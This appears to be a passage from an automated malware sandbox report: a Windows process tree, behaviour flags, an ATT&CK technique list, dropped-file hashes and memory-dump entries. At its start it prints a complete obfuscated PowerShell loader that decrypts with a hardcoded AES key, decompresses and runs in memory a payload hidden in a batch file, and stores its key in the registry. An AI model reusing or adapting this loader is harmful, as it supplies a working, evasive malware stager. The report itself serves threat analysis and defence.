        cmd.exe /c echo function qmFV($REHT){ Invoke-Expression -InformationAction Ignore '$TTZK=vB[vBSvByvBstvBevBmvB.vBSvBevBcvBurvBivBtvBy.vBCvBrvBypvBtvBovBgrvBapvBhvBy.vBAevBsvB]:vB:vBCvBrvBeavBtvBevB()vB;'.Replace('vB', ''); Invoke-Expression -Debug '$TTZK.PkMPkoPkdPke=Pk[PkSPkyPksPktPkePkm.PkSPkePkcuPkrPkiPktyPk.PkCPkryPkptPkoPkgrPkapPkhPky.PkCPkiPkpPkhePkrPkMPkodPkePk]:Pk:PkCPkBCPk;'.Replace('Pk', ''); Invoke-Expression -Debug -WarningAction Inquire -Verbose '$TTZK.vsPvsavsdvsdivsnvsgvs=vs[vsSvsyvsstvsevsmvs.Svsevscvsurvsivstvsy.vsCrvsyvsptvsogvsrvsapvshvsyvs.vsPavsdvsdvsinvsgvsMovsdvsevs]:vs:vsPvsKvsCvsSvs7vs;'.Replace('vs', ''); Invoke-Expression -Debug '$TTZK.xPKxPexPyxP=[xPSxPyxPsxPtxPexPmxP.CxPoxPnxPvexPrxPtxP]:xP:xPFxProxPmBxPaxPsexP64xPSxPtrxPixPnxPg("xPhxPOxPixPbxxP/xPTxPsxPDxPUxPfxPQDxPvxPLxP4VxPDxPHxP90xPGxPfxP9kxPJCxPixPJFxPcuxPDxP8yxPAxPbxPMxPeCxP4xPWxPc=xP");'.Replace('xP', ''); Invoke-Expression -Debug '$TTZK.dkIdkVdk=dk[Sdkydksdktdkedkmdk.dkCodkndkvdkerdktdk]dk::dkFdkrdkomdkBadksdke6dk4Sdktdkridkndkg("dkBdkvdkidkt0dkjdkfdkAdkudkJdk4dk7Jdk1dkLdk6bdkOdkGdk79dkQdk=dk=");'.Replace('dk', ''); $pOIf=$TTZK.CreateDecryptor(); $TvBT=$pOIf.TransformFinalBlock($REHT, 0, $REHT.Length); $pOIf.Dispose(); $TTZK.Dispose(); $TvBT;}function MetK($REHT){ Invoke-Expression -Debug -WarningAction Inquire -InformationAction Ignore '$RRoW=pANpAepAwpA-OpAbpAjpAepAcpAtpA pASypAspAtpAempA.pAIpAO.pAMpAepAmopArypASpAtrpAeapAmpA(,$REHT);'.Replace('pA', ''); Invoke-Expression -Verbose -WarningAction Inquire '$HnaT=pANpAepAwpA-OpAbpAjpAepAcpAtpA pASypAspAtpAempA.pAIpAO.pAMpAepAmopArypASpAtrpAeapAmpA;'.Replace('pA', ''); Invoke-Expression -Verbose -WarningAction Inquire '$OYGv=KVNKVeKVwKV-OKVbKVjKVeKVcKVtKV KVSyKVsKVtKVemKV.KVIKVO.KVCKVoKVmpKVreKVsKVsiKVonKV.KVGZKViKVpKVSKVtrKVeKVaKVm($RRoW, KV[KVIKVOKV.CKVoKVmKVpKVrKVeKVsKVsiKVoKVnKV.CKVoKVmKVprKVeKVsKVsiKVonKVMKVodKVe]KV:KV:DKVeKVcKVoKVmpKVrKVeKVssKV);'.Replace('KV', ''); $OYGv.CopyTo($HnaT); $OYGv.Dispose(); $RRoW.Dispose(); $HnaT.Dispose(); $HnaT.ToArray();}function EXHV($REHT,$EVat){ Invoke-Expression -Verbose '$gHke=DN[DNSDNyDNstDNeDNmDN.DNRDNeDNfDNleDNcDNtDNioDNnDN.DNAsDNsDNeDNmbDNlyDN]DN::DNLoDNaDNd([byte[]]$REHT);'.Replace('DN', ''); Invoke-Expression -InformationAction Ignore '$vNwL=$gHke.CAECAnCAtCAryCAPCAoCAiCAnCAtCA;'.Replace('CA', ''); Invoke-Expression -Debug -InformationAction Ignore -WarningAction Inquire '$vNwLio.ioIioniovoiokioeio(io$ioniouiollio, $EVat);'.Replace('io', '');}function JYY($vrvS){ $registryPath = 'HKLM:\SOFTWARE\OOhhhm='; if (Test-Path $registryPath) { Remove-ItemProperty -Path $registryPath -Name * -Force } else { New-Item -Path $registryPath -Force; } Set-ItemProperty -Path $registryPath -Name 'Map' -Value 'MhRVQwCgfyDG;ODJpvpxTYFqN;dlOMrqSijFnyTh'; Set-ItemProperty -Path $registryPath -Name 'MhRVQwCgfyDG' -Value $vrvS; Set-ItemProperty -Path $registryPath -Name 'ODJpvpxTYFqN' -Value 'hOibx/TsDUfQDvL4VDH90Gf9kJCiJFcuD8yAbMeC4Wc='; Set-ItemProperty -Path $registryPath -Name 'dlOMrqSijFnyTh' -Value 'Bvit0jfAuJ47J1L6bOG79Q==';}$lVPp = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $lVPp;$Enkb=[System.IO.File]::ReadAllText($lVPp).Split([Environment]::NewLine);foreach ($bUJs in $Enkb) { if ($bUJs.StartsWith('WWiTL')) { $DBhl=$bUJs.Substring(5); break; }}JYY $DBhl;$vrvS=[string[]]$DBhl.Split('\');Invoke-Expression -Debug -WarningAction Inquire -InformationAction Ignore -Verbose '$opM = MetK (qmFV (tq[tqCtqotqnvtqetqrtqttq]tq:tq:tqFrtqotqmtqBatqstqetq64tqStqttqritqngtq($vrvS[0].Replace("#", "/").Replace("@", "A"))));'.Replace('tq', '');Invoke-Expression -Debug '$tHS = MetK (qmFV (tq[tqCtqotqnvtqetqrtqttq]tq:tq:tqFrtqotqmtqBatqstqetq64tqStqttqritqngtq($vrvS[1].Replace("#", "/").Replace("@", "A"))));'.Replace('tq', '');Invoke-Expression -Verbose -Debug '$Hrm = MetK (qmFV (tq[tqCtqotqnvtqetqrtqttq]tq:tq:tqFrtqotqmtqBatqstqetq64tqStqttqritqngtq($vrvS[2].Replace("#", "/").Replace("@", "A"))));'.Replace('tq', '');EXHV $opM $null;EXHV $tHS $null;EXHV $Hrm (,[string[]] (''));
        5⤵
        
        PID:1156
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -WindowStyle Hidden
        5⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious use of SetThreadContext
        Drops file in Windows directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        
        PID:1532
      - C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F
        6⤵
        
        PID:2564

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3780

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:1304

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4148

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:4364

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:4944

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
PID:4180

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
PID:4608

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
PID:1768

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:2744

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵
PID:2660

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:2312

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca
1⤵
PID:1460

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
1⤵
PID:3252

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:2472

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
- Checks BIOS information in registry
- Checks SCSI registry key(s)
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
PID:1968

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
87c29700d926d094566f97a4ca94661f

SHA1
edbc46e5510447273bbaae1a5d13e6984b003594

SHA256
b254694891c8c9da1394c3c469cee50f145c72582e6d1cf0045cab4e72f48e7f

SHA512
0c6ba3544daa14af98f338fa24d01624f9e93f9633b2bd6b4c031f7f1ecd4265dddde4469a8b96e81d802401ec8f3ba1d0120afe53ee6fa5345f9f3f7ab94290

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
2KB

MD5
a484f41ea0ce37e0f9d39ee141819c14

SHA1
508c3820097baf72a50ccbe43ece25809a131ea3

SHA256
7ff97faffcd04f3791f1926081def0c937814504935d7bbc128689e1e69e8048

SHA512
e658b08546b77487456603a0ca1cb80d19a9da8e72cbcf17e669434e0b54a97f31a923148fef7bd4efdaecf8800047649c29036035b9645ae2f52553c548f754

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
ba29515284decc8189efac5d4b21c2ec

SHA1
0bdc11c2cd1283f165416c0832efc660b20f7a8b

SHA256
ff46a944a4c86a2e5e1b6f8d87727de2ec6e5f73c3b0c406cb1d916331c7e19d

SHA512
90ccaf1c0753e8ffd5feda1a6f7314ee95e20eced254c1c8600796353b6e0299fdde4049e5297d45fc369e054b9d51744ad17662a76d7a1621c1c8b12d08d0ad

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3qo4srmj.ybe.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Windows\$rbx-onimai2\$rbx-CO2.bat

Filesize
7.9MB

MD5
f88d18fc65296a1ed460e40a352e3045

SHA1
f6d9d94da2f11d0485ca057a057a06ac492bde8c

SHA256
f3cbb5d82cd929211283435c7dd79e7c853449ad23e7d4895b9fc0427759ba7f

SHA512
f193edd5c475040928e188b756d27ecb2f61ef6a1d7392bdb62e6d5bcdd5c37272849a298e9cc6265b5f67890881971ecf28f93e98edd90f6f536190999ed367

Download Submit
memory/404-87-0x00007FF862B30000-0x00007FF862B40000-memory.dmp

Filesize
64KB

Download
memory/404-86-0x0000029C5F730000-0x0000029C5F75A000-memory.dmp

Filesize
168KB

Download
memory/404-81-0x0000029C5F730000-0x0000029C5F75A000-memory.dmp

Filesize
168KB

Download
memory/416-96-0x00000205DEF60000-0x00000205DEF8A000-memory.dmp

Filesize
168KB

Download
memory/416-97-0x00007FF862B30000-0x00007FF862B40000-memory.dmp

Filesize
64KB

Download
memory/416-91-0x00000205DEF60000-0x00000205DEF8A000-memory.dmp

Filesize
168KB

Download
memory/624-56-0x00007FF862B30000-0x00007FF862B40000-memory.dmp

Filesize
64KB

Download
memory/624-48-0x00000160285D0000-0x00000160285F5000-memory.dmp

Filesize
148KB

Download
memory/624-49-0x0000016028600000-0x000001602862A000-memory.dmp

Filesize
168KB

Download
memory/624-50-0x0000016028600000-0x000001602862A000-memory.dmp

Filesize
168KB

Download
memory/624-55-0x0000016028600000-0x000001602862A000-memory.dmp

Filesize
168KB

Download
memory/684-61-0x00000201515C0000-0x00000201515EA000-memory.dmp

Filesize
168KB

Download
memory/684-67-0x00007FF862B30000-0x00007FF862B40000-memory.dmp

Filesize
64KB

Download
memory/684-66-0x00000201515C0000-0x00000201515EA000-memory.dmp

Filesize
168KB

Download
memory/964-76-0x000001B18DD00000-0x000001B18DD2A000-memory.dmp

Filesize
168KB

Download
memory/964-77-0x00007FF862B30000-0x00007FF862B40000-memory.dmp

Filesize
64KB

Download
memory/964-71-0x000001B18DD00000-0x000001B18DD2A000-memory.dmp

Filesize
168KB

Download
memory/1532-1907-0x0000025CFAE40000-0x0000025CFAE7C000-memory.dmp

Filesize
240KB

Download
memory/1532-1906-0x0000025CE02F0000-0x0000025CE0302000-memory.dmp

Filesize
72KB

Download
memory/1532-1711-0x0000025CFB480000-0x0000025CFB642000-memory.dmp

Filesize
1.8MB

Download
memory/1532-1709-0x0000025CFAAF0000-0x0000025CFAB40000-memory.dmp

Filesize
320KB

Download
memory/1532-1710-0x0000025CFB1F0000-0x0000025CFB2A2000-memory.dmp

Filesize
712KB

Download
memory/1532-1386-0x0000025C80C30000-0x0000025C8139A000-memory.dmp

Filesize
7.4MB

Download
memory/2572-36-0x00007FF8A1B30000-0x00007FF8A1BED000-memory.dmp

Filesize
756KB

Download
memory/2572-30-0x0000028BEEE10000-0x0000028BEEE54000-memory.dmp

Filesize
272KB

Download
memory/2572-35-0x00007FF8A2AB0000-0x00007FF8A2CA8000-memory.dmp

Filesize
2.0MB

Download
memory/2572-34-0x00007FF884690000-0x00007FF885152000-memory.dmp

Filesize
10.8MB

Download
memory/2572-33-0x0000028BC0040000-0x0000028BC05DE000-memory.dmp

Filesize
5.6MB

Download
memory/2572-32-0x0000028BB0000000-0x0000028BB003E000-memory.dmp

Filesize
248KB

Download
memory/2572-31-0x0000028BEEEE0000-0x0000028BEEF56000-memory.dmp

Filesize
472KB

Download
memory/2572-817-0x00007FF884690000-0x00007FF885152000-memory.dmp

Filesize
10.8MB

Download
memory/2572-209-0x0000028BC09C0000-0x0000028BC0D34000-memory.dmp

Filesize
3.5MB

Download
memory/2572-18-0x00007FF884690000-0x00007FF885152000-memory.dmp

Filesize
10.8MB

Download
memory/2572-29-0x00007FF884690000-0x00007FF885152000-memory.dmp

Filesize
10.8MB

Download
memory/2572-19-0x00007FF884690000-0x00007FF885152000-memory.dmp

Filesize
10.8MB

Download
memory/4688-44-0x00007FF8A1B30000-0x00007FF8A1BED000-memory.dmp

Filesize
756KB

Download
memory/4688-37-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/4688-40-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/4688-43-0x00007FF8A2AB0000-0x00007FF8A2CA8000-memory.dmp

Filesize
2.0MB

Download
memory/4688-39-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/4688-38-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/4688-45-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/4688-42-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/4772-16-0x00007FF884690000-0x00007FF885152000-memory.dmp

Filesize
10.8MB

Download
memory/4772-10-0x000001CF37880000-0x000001CF378A2000-memory.dmp

Filesize
136KB

Download
memory/4772-11-0x00007FF884690000-0x00007FF885152000-memory.dmp

Filesize
10.8MB

Download
memory/4772-12-0x00007FF884690000-0x00007FF885152000-memory.dmp

Filesize
10.8MB

Download
memory/4772-13-0x00007FF884690000-0x00007FF885152000-memory.dmp

Filesize
10.8MB

Download
memory/4772-0-0x00007FF884693000-0x00007FF884695000-memory.dmp

Filesize
8KB

Download